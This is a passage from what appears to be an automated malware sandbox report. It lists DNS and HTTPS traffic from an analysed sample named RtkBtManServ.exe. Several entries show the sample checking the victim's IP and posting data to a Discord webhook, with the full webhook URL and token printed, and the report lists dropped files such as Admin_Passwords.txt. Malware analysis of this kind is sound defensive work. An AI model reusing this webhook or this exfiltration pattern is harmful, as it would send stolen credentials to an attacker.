                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 400 Bad Request
                                      Date: Thu, 13 Apr 2023 17:34:28 GMT
                                      Content-Type: application/json
                                      Content-Length: 80
                                      Connection: keep-alive
                                      set-cookie: __dcfduid=7123d53cda2111ed8ce5be537e3c5245; Expires=Tue, 11-Apr-2028 17:34:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1681407269
                                      x-ratelimit-reset-after: 1
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DbcY9WlcvugrVrXgZZu0HB%2BF7CQEi2XjpB3%2Bxc%2FCw9%2FVImvCZcDXS9q4xWSaegHHcA44RPQG1%2BOBxLKtQWQ3Yhk6nzMXQGfk9gdxrPL0ZGhoHyyCONLp%2BXCsPW4w"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Set-Cookie: __sdcfduid=7123d53cda2111ed8ce5be537e3c5245b68dfdd4126b98f394ed80565a5ba0296f569e83ee70bf627a017762cf56b8f2; Expires=Tue, 11-Apr-2028 17:34:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                      Set-Cookie: __cfruid=a6a8ab15a945db6e921a8afb42c67026d2684f64-1681407268; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 7b7575c2fc86b960-AMS
                                    • flag-us
                                      DNS
                                      203.33.253.131.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      203.33.253.131.in-addr.arpa
                                      IN PTR
                                      Response
                                      203.33.253.131.in-addr.arpa
                                      IN PTR
                                      a-0003 dc-msedgenet
                                    • flag-us
                                      DNS
                                      contile.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      contile.services.mozilla.com
                                      IN A
                                      Response
                                      contile.services.mozilla.com
                                      IN A
                                      34.117.237.239
                                    • flag-us
                                      DNS
                                      getpocket.cdn.mozilla.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      getpocket.cdn.mozilla.net
                                      IN A
                                      Response
                                      getpocket.cdn.mozilla.net
                                      IN CNAME
                                      getpocket-cdn.prod.mozaws.net
                                      getpocket-cdn.prod.mozaws.net
                                      IN CNAME
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      IN A
                                      34.120.5.221
                                    • flag-us
                                      DNS
                                      contile.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      contile.services.mozilla.com
                                      IN A
                                      Response
                                      contile.services.mozilla.com
                                      IN A
                                      34.117.237.239
                                    • flag-us
                                      DNS
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      IN A
                                      Response
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      IN A
                                      34.120.5.221
                                    • flag-us
                                      DNS
                                      contile.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      contile.services.mozilla.com
                                      IN AAAA
                                      Response
                                    • flag-us
                                      DNS
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      IN AAAA
                                      Response
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      IN AAAA
                                      2600:1901:0:524c::
                                    • flag-us
                                      DNS
                                      154.239.44.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      154.239.44.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      239.237.117.34.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      239.237.117.34.in-addr.arpa
                                      IN PTR
                                      Response
                                      239.237.117.34.in-addr.arpa
                                      IN PTR
                                      23923711734bcgoogleusercontentcom
                                    • flag-us
                                      DNS
                                      221.5.120.34.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      221.5.120.34.in-addr.arpa
                                      IN PTR
                                      Response
                                      221.5.120.34.in-addr.arpa
                                      IN PTR
                                      221512034bcgoogleusercontentcom
                                    • flag-us
                                      DNS
                                      firefox.settings.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      firefox.settings.services.mozilla.com
                                      IN A
                                      Response
                                      firefox.settings.services.mozilla.com
                                      IN A
                                      35.241.9.150
                                    • flag-us
                                      DNS
                                      shavar.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      shavar.services.mozilla.com
                                      IN A
                                      Response
                                      shavar.services.mozilla.com
                                      IN CNAME
                                      shavar.prod.mozaws.net
                                      shavar.prod.mozaws.net
                                      IN A
                                      54.149.234.21
                                      shavar.prod.mozaws.net
                                      IN A
                                      35.160.145.179
                                      shavar.prod.mozaws.net
                                      IN A
                                      44.238.157.127
                                      shavar.prod.mozaws.net
                                      IN A
                                      54.189.57.246
                                      shavar.prod.mozaws.net
                                      IN A
                                      34.211.203.81
                                      shavar.prod.mozaws.net
                                      IN A
                                      54.148.4.3
                                    • flag-us
                                      DNS
                                      shavar.prod.mozaws.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      shavar.prod.mozaws.net
                                      IN A
                                      Response
                                      shavar.prod.mozaws.net
                                      IN A
                                      34.211.203.81
                                      shavar.prod.mozaws.net
                                      IN A
                                      44.238.157.127
                                      shavar.prod.mozaws.net
                                      IN A
                                      54.148.4.3
                                      shavar.prod.mozaws.net
                                      IN A
                                      54.189.57.246
                                      shavar.prod.mozaws.net
                                      IN A
                                      35.160.145.179
                                      shavar.prod.mozaws.net
                                      IN A
                                      54.149.234.21
                                    • flag-us
                                      DNS
                                      firefox.settings.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      firefox.settings.services.mozilla.com
                                      IN A
                                      Response
                                      firefox.settings.services.mozilla.com
                                      IN A
                                      35.241.9.150
                                    • flag-us
                                      DNS
                                      push.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      push.services.mozilla.com
                                      IN A
                                      Response
                                      push.services.mozilla.com
                                      IN CNAME
                                      autopush.prod.mozaws.net
                                      autopush.prod.mozaws.net
                                      IN A
                                      34.117.65.55
                                    • flag-us
                                      DNS
                                      firefox.settings.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      firefox.settings.services.mozilla.com
                                      IN AAAA
                                      Response
                                    • flag-us
                                      DNS
                                      firefox.settings.services.mozilla.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      firefox.settings.services.mozilla.com
                                      IN AAAA
                                      Response
                                    • flag-us
                                      DNS
                                      autopush.prod.mozaws.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      autopush.prod.mozaws.net
                                      IN A
                                      Response
                                      autopush.prod.mozaws.net
                                      IN A
                                      34.117.65.55
                                    • flag-us
                                      DNS
                                      shavar.prod.mozaws.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      shavar.prod.mozaws.net
                                      IN AAAA
                                      Response
                                    • flag-us
                                      DNS
                                      shavar.prod.mozaws.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      shavar.prod.mozaws.net
                                      IN AAAA
                                      Response
                                    • flag-us
                                      DNS
                                      autopush.prod.mozaws.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      autopush.prod.mozaws.net
                                      IN AAAA
                                      Response
                                    • flag-us
                                      DNS
                                      content-signature-2.cdn.mozilla.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      content-signature-2.cdn.mozilla.net
                                      IN A
                                      Response
                                      content-signature-2.cdn.mozilla.net
                                      IN CNAME
                                      content-signature-chains.prod.autograph.services.mozaws.net
                                      content-signature-chains.prod.autograph.services.mozaws.net
                                      IN CNAME
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      IN A
                                      34.160.144.191
                                    • flag-us
                                      DNS
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      IN A
                                      Response
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      IN A
                                      34.160.144.191
                                    • flag-us
                                      DNS
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      IN AAAA
                                      Response
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      IN AAAA
                                      2600:1901:0:92a9::
                                    • flag-us
                                      DNS
                                      150.9.241.35.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      150.9.241.35.in-addr.arpa
                                      IN PTR
                                      Response
                                      150.9.241.35.in-addr.arpa
                                      IN PTR
                                      150924135bcgoogleusercontentcom
                                    • flag-us
                                      DNS
                                      21.234.149.54.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      21.234.149.54.in-addr.arpa
                                      IN PTR
                                      Response
                                      21.234.149.54.in-addr.arpa
                                      IN PTR
                                      ec2-54-149-234-21 us-west-2compute amazonawscom
                                    • flag-us
                                      DNS
                                      55.65.117.34.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      55.65.117.34.in-addr.arpa
                                      IN PTR
                                      Response
                                      55.65.117.34.in-addr.arpa
                                      IN PTR
                                      556511734bcgoogleusercontentcom
                                    • flag-us
                                      DNS
                                      191.144.160.34.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      191.144.160.34.in-addr.arpa
                                      IN PTR
                                      Response
                                      191.144.160.34.in-addr.arpa
                                      IN PTR
                                      19114416034bcgoogleusercontentcom
                                    • flag-us
                                      DNS
                                      191.144.160.34.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      191.144.160.34.in-addr.arpa
                                      IN PTR
                                      Response
                                      191.144.160.34.in-addr.arpa
                                      IN PTR
                                      19114416034bcgoogleusercontentcom
                                    • flag-us
                                      DNS
                                      100.39.251.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      100.39.251.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      100.39.251.142.in-addr.arpa
                                      IN PTR
                                      ams15s48-in-f41e100net
                                    • flag-us
                                      DNS
                                      206.23.85.13.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      206.23.85.13.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      195.179.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      195.179.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      195.179.250.142.in-addr.arpa
                                      IN PTR
                                      ams15s42-in-f31e100net
                                    • flag-us
                                      DNS
                                      131.179.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      131.179.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      131.179.250.142.in-addr.arpa
                                      IN PTR
                                      ams17s10-in-f31e100net
                                    • flag-us
                                      DNS
                                      assets.msn.com
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      assets.msn.com
                                      IN A
                                      Response
                                      assets.msn.com
                                      IN CNAME
                                      assets.msn.com.edgekey.net
                                      assets.msn.com.edgekey.net
                                      IN CNAME
                                      e28578.d.akamaiedge.net
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.120
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.106
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.107
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.131
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.123
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.104
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.121
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.115
                                      e28578.d.akamaiedge.net
                                      IN A
                                      104.126.36.42
                                    • flag-us
                                      DNS
                                      108.211.229.192.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      108.211.229.192.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      120.36.126.104.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      120.36.126.104.in-addr.arpa
                                      IN PTR
                                      Response
                                      120.36.126.104.in-addr.arpa
                                      IN PTR
                                      a104-126-36-120deploystaticakamaitechnologiescom
                                    • flag-us
                                      DNS
                                      120.36.126.104.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      120.36.126.104.in-addr.arpa
                                      IN PTR
                                      Response
                                      120.36.126.104.in-addr.arpa
                                      IN PTR
                                      a104-126-36-120deploystaticakamaitechnologiescom
                                    • flag-us
                                      DNS
                                      64.13.109.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      64.13.109.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • 104.18.7.185:443
                                      tls
                                      92 B
                                      119 B
                                      2
                                      2
                                    • 172.64.133.29:443
                                      tls
                                      92 B
                                      119 B
                                      2
                                      2
                                    • 188.114.96.0:443
                                      tls
                                      92 B
                                      119 B
                                      2
                                      2
                                    • 173.231.16.75:443
                                      https://api64.ipify.org/
                                      tls, http
                                      RtkBtManServ.exe
                                      831 B
                                      6.8kB
                                      9
                                      9

                                      HTTP Request

                                      GET https://api64.ipify.org/

                                      HTTP Response

                                      200
                                    • 162.159.135.232:443
                                      https://discord.com/api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-?wait=true
                                      tls, http
                                      RtkBtManServ.exe
                                      2.3kB
                                      7.1kB
                                      14
                                      17

                                      HTTP Request

                                      GET https://discord.com/api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-

                                      HTTP Response

                                      200

                                      HTTP Request

                                      POST https://discord.com/api/v6/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-?wait=true

                                      HTTP Response

                                      200
                                    • 162.159.135.232:443
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      tls, http
                                      RtkBtManServ.exe
                                      393.4kB
                                      7.4kB
                                      293
                                      143

                                      HTTP Request

                                      POST https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-

                                      HTTP Response

                                      400
                                    • 162.159.135.232:443
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      tls, http
                                      RtkBtManServ.exe
                                      1.7kB
                                      2.0kB
                                      9
                                      9

                                      HTTP Request

                                      POST https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-

                                      HTTP Response

                                      400
                                    • 162.159.135.232:443
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      tls, http
                                      RtkBtManServ.exe
                                      6.4kB
                                      2.1kB
                                      13
                                      10

                                      HTTP Request

                                      POST https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-

                                      HTTP Response

                                      400
                                    • 162.159.135.232:443
                                      https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-
                                      tls, http
                                      RtkBtManServ.exe
                                      8.5kB
                                      2.1kB
                                      15
                                      11

                                      HTTP Request

                                      POST https://discord.com/api/webhooks/1042438126049705984/siMaqD1vU4570VR2gMlW_V25A4jIjpRwkFi5VhNNrhuIerZKbiO_cRt261P3EIZXsba-

                                      HTTP Response

                                      400
                                    • 216.239.34.117:443
                                      tls
                                      46 B
                                      113 B
                                      1
                                      1
                                    • 104.21.69.128:443
                                      tls
                                      92 B
                                      119 B
                                      2
                                      2
                                    • 34.117.237.239:443
                                      contile.services.mozilla.com
                                      tls
                                      1.8kB
                                      7.2kB
                                      15
                                      18
                                    • 34.120.5.221:443
                                      getpocket.cdn.mozilla.net
                                      tls
                                      2.0kB
                                      45.6kB
                                      19
                                      46
                                    • 54.149.234.21:443
                                      shavar.services.mozilla.com
                                      tls
                                      2.2kB
                                      4.2kB
                                      10
                                      11
                                    • 35.241.9.150:443
                                      firefox.settings.services.mozilla.com
                                      tls
                                      2.9kB
                                      11.2kB
                                      27
                                      36
                                    • 34.117.65.55:443
                                      push.services.mozilla.com
                                      tls
                                      1.9kB
                                      6.0kB
                                      13
                                      13
                                    • 162.159.135.232:443
                                      discord.com
                                      tls
                                      1.7kB
                                      2.0kB
                                      9
                                      9
                                    • 35.241.9.150:443
                                      firefox.settings.services.mozilla.com
                                      tls
                                      1.2kB
                                      5.6kB
                                      10
                                      9
                                    • 34.160.144.191:443
                                      content-signature-2.cdn.mozilla.net
                                      tls
                                      2.2kB
                                      12.1kB
                                      19
                                      28
                                    • 20.189.173.12:443
                                      322 B
                                      7
                                    • 104.21.52.43:443
                                      tls
                                      92 B
                                      119 B
                                      2
                                      2
                                    • 104.126.36.120:443
                                      assets.msn.com
                                      tls
                                      2.7kB
                                      11.1kB
                                      22
                                      20
                                    • 8.238.177.126:80
                                      322 B
                                      7
                                    • 93.184.220.29:80
                                      322 B
                                      7
                                    • 8.238.177.126:80
                                      322 B
                                      7
                                    • 216.239.32.116:443
                                      tls
                                      46 B
                                      113 B
                                      1
                                      1
                                    • 216.58.208.99:443
                                      tls
                                      46 B
                                      113 B
                                      1
                                      1
                                    • 127.0.0.1:49874
                                      firefox.exe
                                    • 8.8.8.8:53
                                      196.249.167.52.in-addr.arpa
                                      dns
                                      73 B
                                      147 B
                                      1
                                      1

                                      DNS Request

                                      196.249.167.52.in-addr.arpa

                                    • 8.8.8.8:53
                                      254.105.26.67.in-addr.arpa
                                      dns
                                      72 B
                                      126 B
                                      1
                                      1

                                      DNS Request

                                      254.105.26.67.in-addr.arpa

                                    • 8.8.8.8:53
                                      8.3.197.209.in-addr.arpa
                                      dns
                                      70 B
                                      111 B
                                      1
                                      1

                                      DNS Request

                                      8.3.197.209.in-addr.arpa

                                    • 8.8.8.8:53
                                      itroublvehacker.gq
                                      dns
                                      RtkBtManServ.exe
                                      64 B
                                      137 B
                                      1
                                      1

                                      DNS Request

                                      itroublvehacker.gq

                                    • 8.8.8.8:53
                                      95.221.229.192.in-addr.arpa
                                      dns
                                      73 B
                                      144 B
                                      1
                                      1

                                      DNS Request

                                      95.221.229.192.in-addr.arpa

                                    • 8.8.8.8:53
                                      api64.ipify.org
                                      dns
                                      RtkBtManServ.exe
                                      61 B
                                      109 B
                                      1
                                      1

                                      DNS Request

                                      api64.ipify.org

                                      DNS Response

                                      173.231.16.75
                                      104.237.62.213
                                      64.185.227.158

                                    • 8.8.8.8:53
                                      discord.com
                                      dns
                                      RtkBtManServ.exe
                                      57 B
                                      137 B
                                      1
                                      1

                                      DNS Request

                                      discord.com

                                      DNS Response

                                      162.159.135.232
                                      162.159.128.233
                                      162.159.138.232
                                      162.159.136.232
                                      162.159.137.232

                                    • 8.8.8.8:53
                                      75.16.231.173.in-addr.arpa
                                      dns
                                      72 B
                                      116 B
                                      1
                                      1

                                      DNS Request

                                      75.16.231.173.in-addr.arpa

                                    • 8.8.8.8:53
                                      232.135.159.162.in-addr.arpa
                                      dns
                                      74 B
                                      136 B
                                      1
                                      1

                                      DNS Request

                                      232.135.159.162.in-addr.arpa

                                    • 8.8.8.8:53
                                      203.33.253.131.in-addr.arpa
                                      dns
                                      73 B
                                      107 B
                                      1
                                      1

                                      DNS Request

                                      203.33.253.131.in-addr.arpa

                                    • 8.8.8.8:53
                                      contile.services.mozilla.com
                                      dns
                                      74 B
                                      90 B
                                      1
                                      1

                                      DNS Request

                                      contile.services.mozilla.com

                                      DNS Response

                                      34.117.237.239

                                    • 8.8.8.8:53
                                      getpocket.cdn.mozilla.net
                                      dns
                                      71 B
                                      174 B
                                      1
                                      1

                                      DNS Request

                                      getpocket.cdn.mozilla.net

                                      DNS Response

                                      34.120.5.221

                                    • 8.8.8.8:53
                                      contile.services.mozilla.com
                                      dns
                                      74 B
                                      90 B
                                      1
                                      1

                                      DNS Request

                                      contile.services.mozilla.com

                                      DNS Response

                                      34.117.237.239

                                    • 8.8.8.8:53
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      dns
                                      82 B
                                      98 B
                                      1
                                      1

                                      DNS Request

                                      prod.pocket.prod.cloudops.mozgcp.net

                                      DNS Response

                                      34.120.5.221

                                    • 8.8.8.8:53
                                      contile.services.mozilla.com
                                      dns
                                      74 B
                                      155 B
                                      1
                                      1

                                      DNS Request

                                      contile.services.mozilla.com

                                    • 8.8.8.8:53
                                      prod.pocket.prod.cloudops.mozgcp.net
                                      dns
                                      82 B
                                      110 B
                                      1
                                      1

                                      DNS Request

                                      prod.pocket.prod.cloudops.mozgcp.net

                                      DNS Response

                                      2600:1901:0:524c::

                                    • 8.8.8.8:53
                                      154.239.44.20.in-addr.arpa
                                      dns
                                      72 B
                                      158 B
                                      1
                                      1

                                      DNS Request

                                      154.239.44.20.in-addr.arpa

                                    • 8.8.8.8:53
                                      239.237.117.34.in-addr.arpa
                                      dns
                                      73 B
                                      126 B
                                      1
                                      1

                                      DNS Request

                                      239.237.117.34.in-addr.arpa

                                    • 8.8.8.8:53
                                      221.5.120.34.in-addr.arpa
                                      dns
                                      71 B
                                      122 B
                                      1
                                      1

                                      DNS Request

                                      221.5.120.34.in-addr.arpa

                                    • 8.8.8.8:53
                                      firefox.settings.services.mozilla.com
                                      dns
                                      83 B
                                      99 B
                                      1
                                      1

                                      DNS Request

                                      firefox.settings.services.mozilla.com

                                      DNS Response

                                      35.241.9.150

                                    • 8.8.8.8:53
                                      shavar.services.mozilla.com
                                      dns
                                      73 B
                                      205 B
                                      1
                                      1

                                      DNS Request

                                      shavar.services.mozilla.com

                                      DNS Response

                                      54.149.234.21
                                      35.160.145.179
                                      44.238.157.127
                                      54.189.57.246
                                      34.211.203.81
                                      54.148.4.3

                                    • 8.8.8.8:53
                                      shavar.prod.mozaws.net
                                      dns
                                      68 B
                                      164 B
                                      1
                                      1

                                      DNS Request

                                      shavar.prod.mozaws.net

                                      DNS Response

                                      34.211.203.81
                                      44.238.157.127
                                      54.148.4.3
                                      54.189.57.246
                                      35.160.145.179
                                      54.149.234.21

                                    • 8.8.8.8:53
                                      firefox.settings.services.mozilla.com
                                      dns
                                      83 B
                                      99 B
                                      1
                                      1

                                      DNS Request

                                      firefox.settings.services.mozilla.com

                                      DNS Response

                                      35.241.9.150

                                    • 8.8.8.8:53
                                      push.services.mozilla.com
                                      dns
                                      71 B
                                      125 B
                                      1
                                      1

                                      DNS Request

                                      push.services.mozilla.com

                                      DNS Response

                                      34.117.65.55

                                    • 8.8.8.8:53
                                      firefox.settings.services.mozilla.com
                                      dns
                                      166 B
                                      334 B
                                      2
                                      2

                                      DNS Request

                                      firefox.settings.services.mozilla.com

                                      DNS Request

                                      firefox.settings.services.mozilla.com

                                    • 8.8.8.8:53
                                      autopush.prod.mozaws.net
                                      dns
                                      70 B
                                      86 B
                                      1
                                      1

                                      DNS Request

                                      autopush.prod.mozaws.net

                                      DNS Response

                                      34.117.65.55

                                    • 8.8.8.8:53
                                      shavar.prod.mozaws.net
                                      dns
                                      136 B
                                      306 B
                                      2
                                      2

                                      DNS Request

                                      shavar.prod.mozaws.net

                                      DNS Request

                                      shavar.prod.mozaws.net

                                    • 8.8.8.8:53
                                      autopush.prod.mozaws.net
                                      dns
                                      70 B
                                      155 B
                                      1
                                      1

                                      DNS Request

                                      autopush.prod.mozaws.net

                                    • 8.8.8.8:53
                                      content-signature-2.cdn.mozilla.net
                                      dns
                                      81 B
                                      235 B
                                      1
                                      1

                                      DNS Request

                                      content-signature-2.cdn.mozilla.net

                                      DNS Response

                                      34.160.144.191

                                    • 8.8.8.8:53
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      dns
                                      103 B
                                      119 B
                                      1
                                      1

                                      DNS Request

                                      prod.content-signature-chains.prod.webservices.mozgcp.net

                                      DNS Response

                                      34.160.144.191

                                    • 8.8.8.8:53
                                      prod.content-signature-chains.prod.webservices.mozgcp.net
                                      dns
                                      103 B
                                      131 B
                                      1
                                      1

                                      DNS Request

                                      prod.content-signature-chains.prod.webservices.mozgcp.net

                                      DNS Response

                                      2600:1901:0:92a9::

                                    • 8.8.8.8:53
                                      150.9.241.35.in-addr.arpa
                                      dns
                                      71 B
                                      122 B
                                      1
                                      1

                                      DNS Request

                                      150.9.241.35.in-addr.arpa

                                    • 8.8.8.8:53
                                      21.234.149.54.in-addr.arpa
                                      dns
                                      72 B
                                      135 B
                                      1
                                      1

                                      DNS Request

                                      21.234.149.54.in-addr.arpa

                                    • 8.8.8.8:53
                                      55.65.117.34.in-addr.arpa
                                      dns
                                      71 B
                                      122 B
                                      1
                                      1

                                      DNS Request

                                      55.65.117.34.in-addr.arpa

                                    • 8.8.8.8:53
                                      191.144.160.34.in-addr.arpa
                                      dns
                                      146 B
                                      252 B
                                      2
                                      2

                                      DNS Request

                                      191.144.160.34.in-addr.arpa

                                      DNS Request

                                      191.144.160.34.in-addr.arpa

                                    • 8.8.8.8:53
                                      100.39.251.142.in-addr.arpa
                                      dns
                                      73 B
                                      111 B
                                      1
                                      1

                                      DNS Request

                                      100.39.251.142.in-addr.arpa

                                    • 8.8.8.8:53
                                      206.23.85.13.in-addr.arpa
                                      dns
                                      71 B
                                      145 B
                                      1
                                      1

                                      DNS Request

                                      206.23.85.13.in-addr.arpa

                                    • 8.8.8.8:53
                                      195.179.250.142.in-addr.arpa
                                      dns
                                      74 B
                                      112 B
                                      1
                                      1

                                      DNS Request

                                      195.179.250.142.in-addr.arpa

                                    • 8.8.8.8:53
                                      131.179.250.142.in-addr.arpa
                                      dns
                                      74 B
                                      112 B
                                      1
                                      1

                                      DNS Request

                                      131.179.250.142.in-addr.arpa

                                    • 8.8.8.8:53
                                      assets.msn.com
                                      dns
                                      60 B
                                      278 B
                                      1
                                      1

                                      DNS Request

                                      assets.msn.com

                                      DNS Response

                                      104.126.36.120
                                      104.126.36.106
                                      104.126.36.107
                                      104.126.36.131
                                      104.126.36.123
                                      104.126.36.104
                                      104.126.36.121
                                      104.126.36.115
                                      104.126.36.42

                                    • 8.8.8.8:53
                                      108.211.229.192.in-addr.arpa
                                      dns
                                      74 B
                                      145 B
                                      1
                                      1

                                      DNS Request

                                      108.211.229.192.in-addr.arpa

                                    • 8.8.8.8:53
                                      120.36.126.104.in-addr.arpa
                                      dns
                                      146 B
                                      278 B
                                      2
                                      2

                                      DNS Request

                                      120.36.126.104.in-addr.arpa

                                      DNS Request

                                      120.36.126.104.in-addr.arpa

                                    • 8.8.8.8:53
                                      64.13.109.52.in-addr.arpa
                                      dns
                                      71 B
                                      145 B
                                      1
                                      1

                                      DNS Request

                                      64.13.109.52.in-addr.arpa

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6exu9k4v.default-release\activity-stream.discovery_stream.json.tmp

                                      Filesize

                                      132KB

                                      MD5

                                      b6b7795f0124b0b776ce225badb24deb

                                      SHA1

                                      71b2df4f57c7b6b57dda2ab43164aec3c731b0ac

                                      SHA256

                                      552b398e259e071b56d0b417394e64c49cf99bd9d6aa3a2f00543c66ac662aa0

                                      SHA512

                                      b2b148b7e9e7f9629b4c5a7029afecb1e41dfb5aabff9696a875fa8c6e3e6c7bd92c1ca4aa235b9537b9feaa60fc39ebcd916d90e1508604b727452e3f7766e2

                                    • C:\Users\Admin\AppData\Local\Temp\Admin_History.txt

                                      Filesize

                                      2B

                                      MD5

                                      f3b25701fe362ec84616a93a45ce9998

                                      SHA1

                                      d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                      SHA256

                                      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                      SHA512

                                      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                    • C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

                                      Filesize

                                      4KB

